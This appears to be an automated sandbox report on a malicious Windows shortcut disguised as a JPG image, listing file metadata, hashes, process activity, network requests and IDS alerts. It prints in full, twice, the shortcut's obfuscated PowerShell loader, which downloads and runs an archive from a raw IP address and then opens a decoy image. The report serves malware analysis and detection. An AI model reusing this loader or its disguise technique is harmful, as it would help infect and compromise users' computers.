File name: | godinnik_n_21_1.jpg.lnk |
Full analysis: | https://app.any.run/tasks/e3e79c8b-4f4a-416b-b6cc-86b94a3666a1 |
Verdict: | Malicious activity |
Analysis date: | December 13, 2024, 22:50:36 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Indicators: | |
MIME: | application/x-ms-shortcut |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=16, Unicoded, Archive, ctime=Sat May 8 08:16:08 2021, atime=Sat May 8 08:16:08 2021, mtime=Sat May 8 08:16:08 2021, length=450560, window=showminnoactive, hot key \005, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |
MD5: | EE092C1452997FFB29A4C9AB1888D6CA |
SHA1: | E9E45B5CE71B16431801BA30A6DF8755714A2873 |
SHA256: | 83DAB2E356E1069FE48BFBA91E1C2CC73CE2738E2870813F9997CEE984BE583F |
SSDEEP: | 48:8rnm3p/7QzQ/Am8w1mtIULm/u5KHuuK7/L4Qja7V:8rnm3pDaQv51mWUamwHuuODBjQ |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | vps49133 |
---|---|
IconFileName: | imageres.dll |
CommandLineArguments: | -win 1 echo xjatYZercafIrnLilRWoneQDsIiDrnQUaeaakzduPsLeRDpRlAWTyBFnuwlhqKlmnU; $COGgnKqkYeVwksaSLgzyWqjcdQSGgmwCkXAXGdebKIwrsIXmylhGwKFWRBFsoFZuEIAGVhjpJqPteRkQOESaeaW = EChozOmVYGCNyrrpGkaxvAGMsBaOPaFqeEUAPMoSTrQUqIuWgAVuBMzFWxDHYbulbZvrELVyg; Do {$n += 1;echo $n} While ($n -lt 1488); if (-not(Test-Path akhmat.''z''i''p -PathType Leaf)){&(g''c''m i*v*******************e-w*t) -ErrorVariable $e -uri h''t''tp'':''/''/''8''0''.6''6''.''79.''9''1''/akhmat.z''i''p -OutFile akhmat.zi''p}; echo nvyvbxiGPiTeGFPCuWUuXv; Expand-Archive -Path akhmat.zi''p -DestinationPath DefenderUpdate; s''tar''t DefenderUpdate/IUService.''e''x''e; Write-Debug vpEGBEDnzJEHamPgEiSawUVrnHnO; &(g''c''m ****ke-*est) -ErrorVariable $e -uri h''t''tp'':''/''/''8''0''.6''6''.''79.''9''1''/chas/godinnik_n_21_1.jpg -OutFile godinnik_n_21_1.jpg; st''a''rt godinnik_n_21_1.jpg |
WorkingDirectory: | %appdata% |
RelativePath: | ..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Description: | JPG File |
LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
VolumeLabel: | - |
DriveSerialNumber: | E6C9-A5BE |
DriveType: | Fixed Disk |
TargetFileDOSName: | powershell.exe |
HotKey: | |
RunWindow: | Show Minimized No Activate |
IconIndex: | 16 |
TargetFileSize: | 450560 |
ModifyDate: | 2021:05:08 08:16:08+00:00 |
AccessDate: | 2021:05:08 08:16:08+00:00 |
CreateDate: | 2021:05:08 08:16:08+00:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6280 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo xjatYZercafIrnLilRWoneQDsIiDrnQUaeaakzduPsLeRDpRlAWTyBFnuwlhqKlmnU; $COGgnKqkYeVwksaSLgzyWqjcdQSGgmwCkXAXGdebKIwrsIXmylhGwKFWRBFsoFZuEIAGVhjpJqPteRkQOESaeaW = EChozOmVYGCNyrrpGkaxvAGMsBaOPaFqeEUAPMoSTrQUqIuWgAVuBMzFWxDHYbulbZvrELVyg; Do {$n += 1;echo $n} While ($n -lt 1488); if (-not(Test-Path akhmat.''z''i''p -PathType Leaf)){&(g''c''m i*v*******************e-w*t) -ErrorVariable $e -uri h''t''tp'':''/''/''8''0''.6''6''.''79.''9''1''/akhmat.z''i''p -OutFile akhmat.zi''p}; echo nvyvbxiGPiTeGFPCuWUuXv; Expand-Archive -Path akhmat.zi''p -DestinationPath DefenderUpdate; s''tar''t DefenderUpdate/IUService.''e''x''e; Write-Debug vpEGBEDnzJEHamPgEiSawUVrnHnO; &(g''c''m ****ke-*est) -ErrorVariable $e -uri h''t''tp'':''/''/''8''0''.6''6''.''79.''9''1''/chas/godinnik_n_21_1.jpg -OutFile godinnik_n_21_1.jpg; st''a''rt godinnik_n_21_1.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6296 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ivdy5cfq.j3c.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c524ol5a.cy4.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nsgc4q5t.mc3.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uxothpks.ujh.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\925ead2c53b4f2c8.customDestinations-ms | binary | |
MD5:68B0B717926DFA6A3B9F32BACACEC6E5 | SHA256:7F3EC1899266AEEEA4BB6D3505E7BF7EAA2E9E3D6C954B8DF79EEE57B69F36CE | |||
6280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\88T8H8Z6XTM01U08106Y.temp | binary | |
MD5:68B0B717926DFA6A3B9F32BACACEC6E5 | SHA256:7F3EC1899266AEEEA4BB6D3505E7BF7EAA2E9E3D6C954B8DF79EEE57B69F36CE | |||
6280 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:D3D6AFC80896A7715C068D7D6C5D1328 | SHA256:CF79504D58FB90F59A1F10EECEB2E42E4865033B0B1DBBC5F603270C2DD6456B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
6280 | powershell.exe | GET | 403 | 80.66.79.91:80 | http://80.66.79.91/chas/godinnik_n_21_1.jpg | unknown | — | — | — |
2380 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2380 | svchost.exe | GET | 200 | 23.53.40.178:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.53.40.178:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6280 | powershell.exe | GET | 403 | 80.66.79.91:80 | http://80.66.79.91/akhmat.zip | unknown | — | — | — |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6480 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
6312 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
2380 | svchost.exe | 23.53.40.178:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.53.40.178:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2380 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 104.126.37.186:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 40.126.32.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
fd.api.iris.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO Dotted Quad Host ZIP Request |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |